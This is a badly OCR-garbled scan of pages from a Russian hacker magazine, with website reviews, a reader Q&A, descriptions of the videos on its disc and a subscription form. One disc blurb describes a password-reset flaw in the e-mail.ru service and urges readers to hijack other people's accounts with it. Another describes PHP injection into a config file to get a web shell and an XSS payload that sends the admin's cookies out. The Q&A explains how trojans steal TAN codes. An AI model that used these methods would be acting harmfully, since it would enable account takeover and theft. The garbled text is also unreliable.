машин ѴѴМѵаге и ѴігІиаІРС, скрипты-приманки для Нопеуроі и пр. 



шиши 



Центр Восстановления Данных Оегзіеіп поможет тебе восстано- 
вить данные на любых цифровых носителях: ЕГОЭ, ПАЮ, СОДЭѴО, 
ЕБАЗН и ТАРЕ. Нет, я не занимаюсь рекламой. Просто на их сайте 
собраны сотни статей о восстановлении данных, о файловых 
структурах, анатомии жестких дисков, описания интерфейсов 
и пр. Имеется возможность свободно скачивать программы для 
восстановления информации на все случаи жизни, так что можно 
проводить восстановление и самостоятельно. Полезен также 
сервис «Статистика "падений" дисков». 



впав 

Кликнув по ссылке, мы попадаем в необыкновенный мир. Мир абсур- 
дных запатентованных изобретений, не имеющих практической 
ценности. На сайте находятся диковинные изобретения, смысл и 
логику которых смогут понять, наверно, только их авторы. Здесь вам 
предложат и гибрид ложки и наручника — для того чтобы ваше чадо 
не роняло без конца ложку на пол, — и женские треногие колгот- 
ки с «запасной» ногой. Не проходите мимо «живого» скафандра для 
любителей кислорода — в шлем нужно всего лишь поместить и как 
следуетукрепить горшочки с кактусами. Вы дышите углекислым газом, 
кактусы его переваривают и выдают кислород. А вот и восхитительная 
Сигнальная Вилка. В процессе непомерного поглощения пищи надо 
краешком глаза смотреть на сигнальные лампочки, и как только сиг- 
нальная лампочка поменяет свой цвет, нужно немедленно прекратить 
трапезу. Весьма оригинальный способ борьбы с перееданием. 




Что скрывается за шумными премьерами очередных киношедев- 
ров, начиная со съемок первого кадра и заканчивая вручением 
наград киноакадемиков? За всем этим, безусловно, стоит огром- 
ный труд не только артистов, но и главных людей в съемочном про- 
цессе — кинорежиссеров. кіпоЬіоагаІ.ги — это электронный био- 
графический энциклопедический словарь, включающий статьи о 
российских и зарубежных режиссерах кино. Ресурс рассчитан 
на самые широкие круги пользователей Сети: журналистов, сту- 
дентов, ученых, рядовых кинозрителей. Киноманы со всего мира 
могут найти здесь любую информацию о своем любимом киноре- 
жиссере. Сайт предоставляет обширную информацию о профес- 
сиональной деятельности режиссера и не затрагивает частную 
сторону его жизни. Словарь имеет разделы по странам, в которых 
в алфавитном порядке представлены имена режиссеров. 



— Е ЕДЕ 




Фракталом называется структура, состоящая из частей, которые 
подобны целому. Короче, это чертовски красивые узоры, кото- 
рые встречаются в живой и неживой природе. На сайте можно 
не только получить вою теоретическую часть по фракталам, но и 
потренироваться в их построении. Достаточно только задать вое 
необходимые атрибуты и нажать кнопку «Построить», а затем 
кнопку «Дальше». Разумеется, можно посмотреть примеры 
стандартных фракталов, таких как «Снежинка Коха», «Кривая 
Гильберта», «Дракон Хартера-Хейтуэя», «Кристалл» и т.д. Сайт 
полностью сделан на флеше. 



АІіС-мания уже повсюду. Этот парень буквально везде: на МТѴ без 
конца крутят его Эа-АІІ-Ѳ зітоѵѵ, он на радио, в кино аіі д іпбабоизе. . . 
Вот и в Сети открылся очередной его сайт под названием сІізЬеаІіа 
сот . Сайт полностью выполнен на флеше и содержит много инте- 
ресных фишек, таких как транслитерация любого текста на язык 
Эа-гезресі, создание своего неповторимого микса на виртуальной 
студии в разделе Эа Міх, создание суперстильного графического 
изображения в картинной галерее. А также в разделе мультиме- 
диа хранится несколько прикольных видеоклипов, а за линком Оа 
рісз скрывается коллекция фотографий АІІ С. 
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О: Когда речь заходит о троянах, форм-граббе- 
рах и прочей заразе, которая способна воровать 
конфиденциальные данные, очень часто упоми- 
нается возможность перехватывать так называе- 
мые ТАІЧ-коды. Объясни популярно, что они со- 
бой представляют и зачем, в принципе, нужны? 
А: Если верить новостям, то за прошлый год уда- 
лые парни из России украли более 1 миллиона 
долларов с банковских счетов честных францу- 
зских граждан. Возможно, сумма слегка преуве- 
личена, но денег действительно увели немало. 
Многие банки сейчас предоставляют своим кли- 
ентам веб-интерфейс для управления своим сче- 
том через Интернет (услуга называется Опііпе 
Вапкіпд), которая, с одной стороны, намного об- 
легчает пользователям жизнь, но с другой - отк- 
рывает безграничные просторы для мошенников. 
С помощью взломанных интернет-ресурсов и 
внедренных в них эксплойтов, с большим процен- 
том пробиваемости они заливают на компьютеры 
посетителей различного рода трояны. Основной 
целью заразы является перехват информации, 
вводимой пользователем в веб-формы. Среди 
множества пользовательских логинов и паролей 
к различным сервисам и службам нередко оказы- 
ваются номера банковских счетов и РІЫ-коды для 
доступа. Завладев подобными данными, хакер 
без труда может авторизироваться на сайте бан- 
ка и попробовать совершить денежные транзак- 
ции. Но в большинстве случаев ничего хорошего 
из этого не выйдет. Службы безопасности отлич- 
но понимают уязвимость подобной схемы, поэто- 
му для совершения любой операции со счетом 
они требуют еще один код — ТАЫ (Тгапзасііоп 
АиШепІісаІіоп ІЧитЬег). Если введенный код ока- 
жется верным, то транзакция пройдет успешно. 
Если кода в распоряжении хакера нет — выпол- 
нение операции завершится ошибкой, то есть 
система попросту откажет в доступе. Примеча- 
тельно, что для каждой конкретной транзакции 
ТАІЧ-код является уникальным. Соответственно, 
если РІЫ-код у каждого владельца счета один, то 
ТАІМ-кодов столько, сколько транзакций необхо- 
димо совершить. В этом и заключается прелесть 
подобного подхода: даже если хакер сможет пе- 
рехватить номер счета, то РІЫ-код и, возможно, 
даже ТАИ все равно не провернут операцию со 
счетом. Для этого ему понадобятся свежие, еще 
не использованные ТАЫ-коды, список которых 
регулярно высылается клиенту банком. Стоит за- 
метить, что продвинутые трояны в некоторых слу- 
чаях могут обойти и эту защиту. Действуют они по 
простой схеме: когда пользователь вводит ТАЫ- 
код и отсылает запрос на сервер, троян выдает 
ему сообщение о неправильно введенном коде и 
требует ввести другой. Второй раз ошибка не вы- 
дается, и пользователь спокойно продолжает ра- 
боту, однако ранее введенный ТАЫ так и останет- 
ся неиспользованным и запишется в логи трояна. 



(3: Как известно, прозрачные прокси выдают ре- 
альный адрес пользователя через НТТР-заголо- 
вок Х-Рогѵѵагсіег-Рог. Так вот вопрос: существуют 
ли прокси-серверы, которые позволяют переда- 
вать поддельный Х-Рогѵѵагсіег-Рог? Было бы кру- 
то написать туда адрес Пентагона и лазить по 
всему инету. Пускай найдут :). 

А: Найти прокси-сервер, поддерживающий подоб- 
ную функцию, оказалось нелегко. Единственный, 
кто на это способен, оказался небезызвестный 
3[АРАЗА]1іпу ргоху (Зргоху). Конфигурация сервера 
осуществляется через текстовый конфиг, который 
в самом простом случае может выглядеть пример- 
но так: 

пзегѵег 127.0.0.1 
аиіб попе 
аііоѵѵ * 
ргоху -р8080 
іпіегпаі 127.0.0.1 
Іод /сіеѵ/пиіі 

Степень анонимности указывается во время за- 
пуска. Существуют два ключа: -а, который указы- 
вает, что прокся будет анонимной, а также -аі , 
которая заставит сервер передавать в качестве 
Х-Ропл/агбег-Рог случайные значения ІР-адресов. 
К сожалению, просто взять и указать сюда конк- 
ретный ІР-адрес нельзя, но никто не говорит, что 
это невозможно в принципе. Как известно, 
3[АРАЗА]1іпу ргоху (Зргоху) распространяется с 
открытыми исходниками, поэтому ты полностью 
можешь подогнать программу под себя. Скажу 
больше: участок кода, отвечающий за заголовок 
Х-Рогѵѵагсіег-Рог, находится в файле ргоху.с. Тут 
все зависит от твоей фантазии: можно реализо- 
вать генерацию ІР по какому-то алгоритму, слу- 
чайный выбор из определенного диапазона (нап- 
ример, привязанного к какому-нибудь біаі-ир про- 
вайдеру), импорт ІР-адреса из отдельного конфи- 
гурационного файла и т.д. и т.п. Только помни, 
что многие сервисы, определив использование 
прокси, попросту откажут тебе в доступе и прямо 
попросят отключить проксик для совершения, 
скажем, денежной транзакции. 

О: Помоги грамотному программисту, которому не 
посчастливилось родиться в провинции. Возмож- 
ности реализовать себя здесь нет, а желание сози- 
дать у меня огромное. Уже не раз получал предло- 
жение по работе от иностранных работодателей, 
которые приглашали принять участие в крупных 
проектах, но есть один нюанс — оплата. Каким об- 
разом я могу принимать гонорары из-за границы? 
А: Первый вариант - самый простой — междуна- 
родный перевод типа ѴѴезІегп ІІпіоп (ѵѵѵѵѵѵ.ѵѵезіег- 
пипіоп.сот) и Мопеу Ѳгат ( ѵѵѵѵѵѵ.топеѵагат.соггі) . 
Подобные услуги предлагают многие банки, поэ- 
тому есть все основания полагать, что таковой 
найдется и в твоем городе. При всей быстроте пе- 
ревода, который в большинстве случаев осущес- 
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твляется мгновенно, есть один серьезный недос- 
таток — огромная комиссия. Настолько огромная, 
что в некоторых случаях может свести весь смысл 
перевода на нет. 

Чеки — это другой вариант. В этом случае ты 
практически ничего не теряешь в денежном от- 
ношение, но серьезно проигрываешь по време- 
ни. Во-первых, тебе придется ждать, пока чек 
дойдет до тебя, а во-вторых, может потребовать- 
ся немало времени и сил, чтобы его обналичить. 
По-моему, игра не стоит свеч. 

Третьим вариантом является банковский пере- 
вод. Но здесь же опять могут возникнуть пробле- 
мы, в том числе юридического характера. Посто- 
янные перечисления на валютный счет могут за- 
интересовать налоговую полицию, а налоги ты, 
по всей видимости, платить не собираешься. 
Оптимальным вариантом, на мой взгляд, являют- 
ся электронные денежные системы ѴѴеЬ Мопеу 
( ѵѵѵѵѵѵ.ѵѵеЬтопеѵ.ги І и Е-ОоІсІ ( ѵѵѵѵѵѵ.е-аоІб.сот Т 
Приобрести электронную валюту без труда мож- 
но в любой стране мира, они легко конвертиру- 
ются между собой и легко выводятся с помощью 
сотен сервисов. И более того, их даже необяза- 
тельно обналичивать, а можно просто использо- 
вать для покупок через Интернет. 

О: В феврале произошла какая-то фигня с моей 
Мігапба’ой. Теперь сообщения до одних адреса- 
тов доходят без проблем, а до других — ни в ка- 
кую. Перекопал все настройки и чего только ни 
перепробовал, но не помогает. А самое веселое, 
что после установки другого клиента — цір’а — 
ничего не изменилось. В чем проблема? 

А: Подобные трудности возникли и у членов Х-сгеѵѵ. 
N№10222, например, никак не мог рассказать мне о 
своей новой машине, а ведь ему так хотелось пох- 
вастаться :). Оказалось, что парням из АОІ_ вздума- 
лось внести коррективы в существующий прото- 
кол, поэтому большинство альтернативных клиен- 
тов на некоторое время остались не у дел. Впро- 
чем, быстро подоспевшие апдейты исправили ситу- 
ацию. Так что обнови клиент — и все будет ок. 

О: Хочу поэкспериментировать над экзотически- 
ми файловыми системами, такими как ВеізегРЗ 
и 6Р$. Какой из Ыпих’ов их поддерживает? 

А: На самом деле, многие. Тот же Ребога Соге 4, 
дистрибутив которого был на 0\Ю прошлого номе- 
ра X, вполне подойдет для экспериментов. По умол- 
чанию эти файловые системы не поддерживаются, 
но никто не мешает активизировать их поддержку 
самостоятельно. Во время инсталляции тебе необ- 
ходимо перейти в командную строку и для актива- 
ции ВеізегРЗ набрать следующее: 

Ііпих $е1іпих=0 геізеіТз 

Для 6Р8 команда будет следующей: 

Ііпих зе1іпих=0 ііз 

Если есть желание заюзать файловую систему 
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ЗАДАВАЯ ВОПРОС. ПОДУМАЙ! НЕ СТОИТ МНЕ ПОСЫЛАТЬ ВОПРОСЫ. ТАК ИЛИ ИНАЧЕ 
СВЯЗАННЫЕ С ХАКОМ/КРЭКОМ/ФРИКОМ — ДЛЯ ЭТОГО ЕСТЬ НАСК-РАО 
(НАСКРАО@РЕАІ_.ХАКЕР.РЦѴ НЕ СТОИТ ТАКЖЕ ЗАДАВАТЬ ОТКРОВЕННО ЛАМЕРСКИЕ 
ВОПРОСЫ. ОТВЕТ НА КОТОРЫЕ ТЫ ПРИ ОПРЕДЕЛЕННОМ ЖЕЛАНИИ МОЖЕШЬ НАЙТИ 
И САМ. Я НЕ ТЕЛЕПАТ. ПОЭТОМУ КОНКРЕТИЗИРУЙ ВОПРОС. ПРИСЫЛАЙ КАК МОЖНО 
БОЛЬШЕ ИНФОРМАЦИИ. 



ХРЗ, то просто набери: 

Ііпих хТз 

Замечу, что все три ФС являются журналируе- 
мыми. Характерной чертой таких файловых сис- 
тем является специальный журнал событий, в 
котором ведется список изменений с файлами. 
Подобный подход позволяет с высокой эффек- 
тивность сохранить целостность файловой сис- 
темы, даже в случае внезапного отключения пи- 
тания или аппаратного сбоя. 

О: В Рейога Соге для быстрой установки программ 
и сервисов встроена специальная утилита Ѵит. Но 
как ей пользоваться? Когда я читал пресс-релиз, 
думал, что эта красивая графическая программа, 
а не какая-то непонятная консольная тулза. :( 

А: В действительности ничего страшного в этой 
утилите нет. Достаточно раз основательно с ней 
разобраться и позже, будь уверен, все пойдет 
как по маслу. Сейчас я попытаюсь разложить 
все по полочкам и начну, пожалуй, с настройки. 
Для этого открой окно терминала и войди в сис- 
тему под рутом (команда зи). 

Далее делай следующее: 

1 . Переходи в каталог /еіс (об /еіс) 

2. С помощью текстового редактора открой конфи- 
гурационный файл уит.сопі (ѵі уит.сопТ) 

3. Замени его содержимое следующим: 

[таіп] 

сасИесІі г=/ѵаг/сасИе/уи т 

ІодІіІе=/ѵаг/Іод/уит.Іод 

ркдроІісу=пе\л/езі 

сіізІгоѵегркд=гесЛіаІ-геІеа5е 

іоІегапЫ 

ехас1агсІі=1 

оЬзоІе1ез=1 

геІгіе$=1 

1ітеоиі=20 

Теперь, когда конфигурация завершена, можно 
приступить к работе. Ѵит поддерживает несколь- 
ко действий. Обновить все пакеты, установлен- 
ные в твоей системе, ты сможешь с помощью ко- 
манды уит ирбаіе. Для установки нужного пакета 
достаточно набрать уит іпзіаІІ <имя_нужного_па- 
кета>. Удаление и обновление проходят не менее 
просто: уит гетоѵе <имя_пакета>, уит ирбаіе 
<имя_пакета>. Список всех доступных обновле- 
ний легко получить, набрав в консоли уит сіпеск- 
ирбаіе. При этом для установки пакета можно и 
не знать его полное имя, тебе поможет поиск: уит 
зеагсіі сключевое слово для поисках 
Впрочем, работать с Уит через консоль совсем не 
обязательно. Многие используют графическую 
оболочку Ѵит Ехіепбег П~іНр://Ііпих.бике.еби/ргоі- 
есіз/ѵит) и ни в чем себе не отказывают. 

О: Каждый раз, когда я нажимаю комбинацию СІгІ- 
АІШеІ и вижу список задач, задаюсь вопросом: от- 
куда столько процессов зѵсітозіехе? Они постоян- 
но ломятся в Интернет, и при этом файрвол дает 
знать о том, что у процесса изменились параметры. 



Все зѵсііозіехе запущены с системными привиле- 
гиями, поэтому выгрузить их не получается. Объяс- 
ни, что с ними делать? 

А: Делать с ними ничего не надо. Процесс 
зѵсНозГехе — он же Ѳепегіс Нозі Ргосезз Тог 
ѴѴіп32 Зегѵісез — предназначен для запуска раз- 
личных системных сервисов, представленных в 
системе в виде динамически загружаемых библи- 
отек (011). Файл зѵсНозГехе расположен в папке 
%ЗузІетРооІ%\5узІет32. На основании записей 
из реестра зѵсИозЕехе составляет список служб, 
которые необходимо запустить. Для каждой из 
них запускается свой экземпляр процесса 
зѵсбозіехе, поэтому в списке текущих процессов 
их, как правило, несколько. Сама по себе служба 
зѵсбозіехе не опасна, но при этом является до- 
вольно уязвимым местом системы. Ведь наравне 
с системными службами, с ее помощью может 
быть загружена и всякая гадость. Каждый раз, 
когда сервис зѵсИозкехе с измененными пара- 
метрами пытается выйти в Сеть, необходимо отс- 
леживать, какая именно служба, запущенная с 
его помощью, пытается это сделать. Для этого 
достаточно набрать в командной строке {азкіізі 
/зѵс. После этого система возвратит список про- 
цесса с подробными комментариями. 

О: Почему .ІЧЕТ-разработчики так опасаются за 
конфиденциальность своего кода, и каким образом 
этот код можно защитить? 

А: Переживания .ІЧЕТ-разработчиков имеют под 
собой вполне весомые основания. Дело в том, что 
любые .ЫЕТ-сборки имеют настолько открытую 
структуру, что при наличии специальных инстру- 
ментов, которые находятся в свободном доступе, 
можно не только вычислить структуру классов, но 
даже дизассемблировать код методов. Байт-код 
любой .ИЕТ-разработки, представленный на спе- 
циальном ІБ-язьіке (Іпіегтесііаіе Бапдиаде), легко 
поддается анализу, поэтому декомпиляторы при 
выполнении некоторых условий без проблем вос- 
станавливают листинг программы на языке более 
высокого уровня, например С#. Только предс- 
тавь: из бинарника при выполнении некоторых 
условий можно получить исходный код, практи- 
чески идентичный первоначальному! 
Естественно, это не очень хорошо, так как 
скрыть свой код от исследования теперь намно- 
го сложнее. Чтобы исправить подобное положе- 
ние дел, широкое распространение получили так 
называемые обфускаторы. Если не вдаваться в 
подробности, то программа со столь странным 
названием меняет настоящие названия всех ме- 
тодов, переменных, пространств имен на другие 
произвольные имена (например, на азб, дбі, 

65І234, Ісізі и прочие бессмысленные наборы 

символов). После подобных преобразовании 
анализировать исходный код программы станет 
практически невозможно. Обфускаторов суще- 
ствует довольно много. Могу выделить: 
РетоІеЗоЙ ЗІатапбег ОЫизсаІог (ѵѵѵѵѵѵ.гетоіе- 



зоЙ.сот/заІатапбег/оЬ^зсаіог.бІтП . 

ЭПауз.ІЧеІ: ІЮЬ^изсаЮг (ѵѵѵѵѵѵ.Эгауз.пеѴсді-Ьіп/сот- 
ропепіз.сді?асі=1&сіб=86). Подробнее о поддержи- 
ваемых функциях и принципах работы можно про- 
читать в статье «Обфускация — есть такое слово» 
( ѵѵѵѵѵѵ.азрпе1тапіа.сот/А[1ісІез/Аі1ісІе.азрх?ІР=36) . 

О: Последний месяц активно занимаюсь поис- 
ком ноутбука. Особое внимание, разумеется, 
уделяю машинам на базе Репйит М. Некоторые 
из них сопровождаются пометкой Золота. Что 
это значит? Не является ли такой процессор уре- 
занной вариацией Репйит’а (типа Сеіегоп)? 

А: Не волнуйся. На самом деле Золота — это 
лейбл второго поколения платформы Іпіеі 
Сепігіпо. Появившись около года назад, она пре- 
доставила производителям ноутбуков возмож- 
ность использовать более мощные процессоры 
Репііит М, работающие на 533 МГЦ шине, чип- 
сеты Іпіеі МоЬіІе 915 Ехргезз, а также беспровод- 
ные адаптеры ІпіеІ РРО/ѴѴігеІезз 2200 (ІЕЕЕ 
802.1 ІЬд) и РРО/ѴѴігеІезз 2915 (ІЕЕЕ 802.11аЬд). 
Ноутбуки на базе Золота работают до 3,5-4 ча- 
сов без перезарядки и поддерживают РРР2, РСІ 
Ехргезз, ЗАТА и прочие прелести, присущие 
обычным десктопам. 

О: Не понимаю, откуда столько шума вокруг 
РігеРох’а. Что в этом браузере особенного? На мой 
взгляд, Орега на два шага впереди! 

А: Все дело в расширяемости, вернее в проду- 
манной системе расширений. С помощью плаги- 
нов от сторонних разработчиков РігеРох можно 
превратить в самую настоящую машину для 
убийства, способную абсолютно на все. Чтобы 
не кидаться пустыми словами, привожу список 
расширений, которые использую лично я: 
АбВІоск РІиз (№://Ьепе.зИез1есі.сот/асіЫоск.^т) — 
отличная резалка рекламы, в том числе РІазб-ба- 
неров, о которых я давно забыл... 

РІазбѲоІ (Іійр://іІазИаоІпеІ) — этот плагин спарива- 
ет РігеРох и внешнюю качалку, в моем случае 
Ооѵѵпіоасі Мазіег’ом. Обходит все ухищрения 
веб-разработчиков и безупречно перехватывает 
даже самые экзотические закачки. 

ІтдЫкеОрега МрѴ/ітаІікеорега.тогсіеѵ.ога) — с по- 
мощью этого плагина появляется возможность быст- 
рого включения/выключения загрузки изображений. 
ЗсгарВоок (бйр://атЬ.ѵіз.пе.ір/тоаІІа/зсгарЬоок) — 
чудо-расширение, позволяющее быстро сохра- 
нять просматриваемую страницу или ее часть в 
удобный каталог. Наконец-то на жестком диске 
не будет свалки из сохраненных документов. 
ЗѵѵіІсИРгоху ТооІ ФНр://то 2 гтюпкеѵ.сот) — прокси 
приходится менять довольно часто, поэтому этот 
плагин для меня очень важен. 

ТаЬЬгоѵѵзег Ехіепзіопз ( ННрѴ/ріго.закига.пе.ір / 
хиІЛаЬехІепзіопз) — значительно улучшает систе- 
му вкладок, предоставляя массу новых возмож- 
ностей. Очень удобная вещь. 

ВШАПѴ ѴОІШ’8 ~5Г 



174 



ХАКЕР 02 /86/ 06 



НОВАЯ ИГРА 




ФУТБОЛЬНЫЙ МЕНЕДЖЕР ” 1 



создай 



гтт 



[ пиньи приз - нощь* на финал ими чшишши гное и? 




По итог ям месяца (март апрель, май, шиюпь *№ 
г уст , сентябрь, октябрь,, ноябрь) приз получает луч 
шая команда данного периода Также поощряете» 
лучшая команда по итогам каждого тура чем 
пионата российской премьер -лиги Даже не очень 
удачный старт не пишает вас шансов на успех? 



ТЫ ПОЛУЧАЕШЬ «135 МИЛЛИОНОВ 

и» приобретен*» игроке* российской г*м* ре 

гистрешп* и* сейте ѵпт.ш'аі-Роеіь» ігу. 

Иф* ствртуег С первым ТурОы ч*--МН№и &14 рвКМЙОКОЙ Пр™иср.--Г1*«І‘и и 
фИНМИрріт млічйкн 30 -РО Тур* 

Твоя ВДМИНЦІ ДОПЫи# СОСТОЯТЬ Н| 11 ое цц н и х >ЯГР04КО«. 4-Х »ПЖйЫК 
Н ГЯМНГО трвмр* КшѵчЖіие МММ я р,иМ4*иШс- ни ііриіИІИИі. Очм 
МЙСІЬ КОМЯІЦН -ИМЯ ІОС» МОН ■ * 9$ 5 

Узнай бсміыі* О приямяда уныяии я и ними игр* ЧутДйЛьнніи мцнна- 
ЖОР" нЦ, р|А?4 чрлшк і&Щ.ІОо&іісИ гч и Апкіжзі чТЧ ТЫ ЯучшЧН фуТбОіЧ 
■ни іяячіріарі 




*• * 
V у 

т' 



* 



Г 











ВИДЕО О ВЗЛОМЕ ПОЧТОВОГО СЕР- 
ВЕРА Е-МАП..ПІІ I 2асІохІік 



Этот сервис — один большой глюк, что, одна- 
ко, не сказывается на количестве его пользо- 
вателей. Я уверен, что, покопавшись, там мож- 
но будет найти еще не одну серьезную уязви- 
мость. Продемонстрированная бага была вы- 
явлена благодаря простому человеческого же- 
ланию сделать так, чтоб ЭТО работало. ЭТО — 
система смены пароля, которая в обычных ус- 
ловиях отказывается работать наотрез. 

А уязвимость заключается в том, что сменить 
пароль пользователя можно, не будучи залоги- 
ненным под этим пользователем. 

Страница смены пароля, по замыслу авторов, 
имеет вид: 

ИЯр://\ллллм.е-таіІ.ги/зсгірІз/пеІаиІб.бІІ?сгпсІ=ра55- 

ѵѵб&и1океп=<АСС>@е- 

таіІ.гц<КЕѴ>&и_Іокеп=<АСС>@е-таіІ.ги<КЕУ> 

Где <КЕѴ> — это, судя по всему, некий иденти- 
фицирующий ключ, а <АСС> — логин. 

У меня лично это почему-то не сработало (вы- 
дало какую-то кривую ошибку идентифика- 
ции). Обидно! Почему я должен додумывать за 
программеров, что они там имели в виду? Пра- 
вильно, незачем. Если просто-напросто убе- 



рем <КЕУ>, то все чудесным образом зарабо- 
тает. Хмм.. наводит на мысль о том, что можно 
аналогичным способом менять пароли для лю- 
бого другого аккаунта. После простой провер- 
ки это подтвердилось... 

Использование данной уязвимости — непаха- 
ное поле для парня, которому нечем себя за- 
нять. Это несколько десятков ІСО-номерков, 
ретривные мыла ко множеству сайтов, аккаун- 
тов во всевозможных системах и, вообще, 
много всего интересного. Используйте все 
скорее, пока контору не попалили. Это наш 
подарок всем читателям и почитателям X :). 

ИССЛЕДОВАНИЕ КОММЕРЧЕСКОГО 
ДВИЖКА НУІР І.ІЗТЕП I ЗТОВМ 



Этот крутой мувик, который поистине не уступает 
лучшим голливудским блокбастерам, описывает 
процесс исследования коммерческого движка НУІР 
Узіег'а. Хакер с ником ЗТОВМ скачивает архив с 
двигом, который стал недавно доступен для свобод- 
ного использования. Первая трудность — РНР-фай- 
лы НУІР Іізіег закодированы 2епсІ Оріітігег'ом, и 
просто так почитать их не удастся. Впрочем, на 
машине багоискателя уже давно установлены 
арасйе+рбр+тузді и сам оптимайзер в дове- 
сок ко всему. Запустив скрипт инсталлирова- 
ния движка, ЗТОВМ принялся тщательно изу- 



чать его и первым делом зашел в админку (во- 
обще, админка — это такое зло, я вам окажу ;). 
Буквально сразу в глаза бросилась первая 
брешь — можно вставить РНР-код вместо указа- 
ния 16-ричного кода одного из цветов шаблона 
(все главные переменные, которые можно наст- 
роить, хранятся в главном конфигурационном 
файле). Теперь, обратившись к конфигурацион- 
ному файлу, можно выполнять любые команды, 
так как мы уже инжектировали в него свой 
РНР-код. Ну что ж, веб-шелл — это, безуслов- 
но, круто, но нужно еще как-то получить доступ 
к самой запароленной панели администриро- 
вания. Хакер и тут не растерялся и начал про- 
щупывать форму для заявок, которую юзер ос- 
тавляет на сайте, а потом ее изучает сам ад- 
мин. Попытки вставить іаѵазогірі в разные поля 
формы ни к чему не привели — все наши 
<зсгір(> тэги резались с помощью з1гір_1адз() 
функции. Наш герой внимательно просмотрел 
НТМБ-сорец страницы и с удивлением обнару- 
жил, что может вставлять свои данные внутри 
тэга <іплд>. На скорую руку была проверена 
эта уязвимость (которая впоследствии оказа- 
лась критической). Запихиваем в тэг ітд собы- 
тие ОпМоизеОѵег и вставляем наш вредонос- 
ный код, отправляющий на мыло кукисы. 

Как только админ проведет мышкой над картин- 
кой, кукисы тут же уплывут. Правда, чтобы над 
картинкой было не трудно провести мыхой, 
нужно увеличить размеры изображения до 
640x480 ;). Хакер успешно осуществляет свой 
хитрый замысел и получает свои куки. И во 
второй половине видео Шторм проделывает 
все вышеописанное на одном из сайтов, где 
установлен Ьуір Іізіег. Стоит ли говорить, что 
он с блеском завладел куками админа и полу- 
чил полный контроль над сайтом. Вот такие 
вот дела, дружок ;). 
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Саісигзе 1 .2 


МогрігѴОХ 2.0 


КаЙеіпе 0.7.1 


Иепігоп 1.03 


КІатАѴ-0.35.1 


Ріиіоп 1.0 ТР 1 


кіеапзшеер 0.2.5 


ЗтагЯА/Іюіз 4.1 


РСМап ЕІІе Мападег 0.2.1 зІаЫе 


ТехІАІопб 2.147 


ІІппатеб Май Ргодгат 0.8.2 


ѴиеЗсап 8.3 


Х-ТООІ.5 


Х-8е1ир Рго ѵ8.0.1 00 


НЯргіпІ 301 


ѵізилі. НАСК++ 


Регтео Зесигііу Ёгіѵег 4.2.6 


Исследование движка НУІР Ібзйг 


РгосеззбиагсІ 3.15 


Видео о взломе почтового сервера е-таіі.ш 


ВМОВСііапде ѵ2.0.0Ь 


Прохождение февральского конкурса 


ШАРОѴѴАКЕ2 


ЦР0АТЕ5 


Абѵапсеб Тіте Верогіз Ргоіеззіопаі 6.2.91 


N0032 8.41 


ВеіказоЯ ІСЁ Нізіогу Ехігасіог Рго 2.02 


Заплатки для ѴѴІпбошз 


Веуопб Сотраге 2.4 Виііб 238 Веіа 


БОНУС 


ЁідіВесгеІ 2.0 Рго 


ІпІегпеІСоппесі 


Еззепііаі №ІТооіз 4.0 


от «МегаФон-Москва» 


ЕаігВоІ 


ЕеЬга ЗоіІРІюпе 1. 2.1.1 


Видео от русской команды паркура 



© 



Мегафон 

Москва 











«Хакер» +2 СО «Хакер » +ОѴО «Хакер» + «Хакерга» 



1 15р 


ЗА НОМЕР 

(экономия 30руб.*) 


ІЗОр 


ЗА НОМЕР 

(экономия 30руб.*) 


207р 


ЗА НОМЕР 

(экономия 85руб.*) 


690р 


ЗА 6 МЕСЯЦЕВ 

(экономия 180 руб.*) 


780р 


ЗА 6 МЕСЯЦЕВ 

(экономия 180 руб.*) 


1 242р 


ЗА 6 МЕСЯЦЕВ 

(экономия 510 руб.*) 


1 242р 


ЗА 12 МЕСЯЦЕВ 

(экономия 460руб.*) 


1 404р 


ЗА 12 МЕСЯЦЕВ 

(экономия 516 руб.*) 


а 

(О 

со 

см 

см 

1 1 


ЗА 12 МЕСЯЦЕВ 

(экономия 1250 руб.*) 


* ЭКОНОМИЯ 


ОТ СРЕДНЕЙ РОЗНИЧНОЙ ЦЕНЫ 


ПО МОСКВЕ 










КАК 

ОФОРМИТЬ 

ЗАКАЗ? 

1 Заполнить купон и квитанцию 

2 Перечислить стоимость подписки через Сбербанк 

3 Обязательно прислать в редакцию копию оплаченной квитанции 
с четко заполненным купоном любым из перечисленных способов : 

по электронной почте: зиЬзсгіЪеѲдІс . ги; 
по факсу: 8-495-780-88-24; 

по адресу: 119021, Москва, ул. Тимура Фрунзе, д.11, стр. 44-45 

ВНИМАНИЕ ! 

подписка оформляется в день обработки купона и квитанции. 
Купоны, отправленные по факсу или электронной почте, обрабаты- 
ваются в течение 5 рабочих дней. Купоны, отправленные почтой 
на адрес редакции обрабатываются в течение 20 дней. 

Рекомендуем использовать электронную почту или факс. 



Подписка производится с номера, выходящего через один 
календарный месяц после оплаты. Например, если произвести 
оплату в сентябре, то подписку можено оформить с ноября. 

По всем вопросам по подписке звони бесплатно по телефону 
8-800-200-3-999 (в том Числе с мобильных телефонов сетей МТС, 
БиЛайн, Мегафон) . Вопросы по подписке можно задавать по е-таіі : 
іпТо@д1с . ги 




Подписка 

для юридических лиц 

Москва: ООО «Интер-Почта», 
тел.: 500-00-60, е-таіі: 
ігтЬег-розб@зоѵіпбе1 . ги 

Регионы : ООО «Корпоративная 
почта», тел.: 953-92-02, 
е-таіі : кррѲ зоѵіпбеі . ги 

Для получения счета на оплату 
подписки нужно прислать заявку 
с названием журнала, периодом 
подписки, банковскими реквизита- 
ми, юридическим и почтовым ад- 
ресом, телефоном и фамилией от- 
ветственного лица за подписку. 
мим . іпбегросЬРа . ги 





ПОДПИСНОЙ КУПОН 

Прошу оформить подписку: 

на журнал Хакер + 2 СО 
на журнал Хакер + ОѴй 
на комплект Хакер +2 СО и Хакер Спец + СО 
на комплектХакер+ ОѴО и Хакер Спец + СО 

на □ месяцев 

начиная с 200_ г. 

I — I Доставлять журнал по почте 
* на домашний адрес 
|—| Доставлять журнал курьером на 
1-1 адрес офиса (по г. Москве) 

Подробнее о курьерской доставке читайте ниже 
(отметьте квадрат выбранного варианта подписки) 

Ф.И.О. 



дата рожд. 



ПП. ПП. ППг. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ) 

код 

е-таіі 

сумма оплаты 

* Курьерская доставка осуществляется только по Москве 
на адрес офиса. Для оформления доставки курьером 
укажите адрес и название фирмы в подписном купоне. 



Ус 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ЗАО ММБ 

р/с № 40702810700010298407 



к/с № 30101810300000000545 



БИ К 044525545 




КПП -772901001 


